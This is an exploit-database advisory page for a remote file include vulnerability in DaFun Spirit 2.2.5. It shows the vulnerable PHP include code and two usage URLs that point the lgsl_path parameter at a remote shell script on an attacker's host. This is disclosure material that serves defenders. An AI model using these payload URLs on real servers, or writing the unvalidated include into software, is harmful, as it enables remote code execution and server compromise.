header-logo
Suggest Exploit
vendor:
DaFun Spirit
by:
mat
7.5
CVSS
HIGH
Multiple Remote File Include
CWE
Product Name: DaFun Spirit
Affected Version From: 2.2.2005
Affected Version To: 2.2.2005
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability

This vulnerability allows an attacker to include remote files on the target server. The vulnerability exists in the DaFun Spirit 2.2.5 script. By manipulating the 'lgsl_path' parameter in the lgsl_protocol.php, an attacker can include arbitrary files from a remote server. This can lead to remote code execution or information disclosure on the target server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the DaFun Spirit script and validate user input before including files.
Source

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability
Script: http://code.google.com/p/dafunspirit/downloads/list
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

Vuln Code

//-----------------------------------------------------------------------------------------------------------+

  $lgsl_path = ""; // RELATIVE PATH BETWEEN THIS FILE AND THE LGSL FOLDER FOR PAGE INTEGRATION

//-----------------------------------------------------------------------------------------------------------+

  require_once($lgsl_path."lgsl_protocol.php");

  $get_ip   = $_GET[ip];
  $get_port = $_GET[port];

//-----------------------------------------------------------------------------------------------------------+

Usage: http://[target]/[path]/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]
       http://[target]/[path]/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]


Greetings: All Hackerz

Navigation

Suggest Exploit

Services By CQR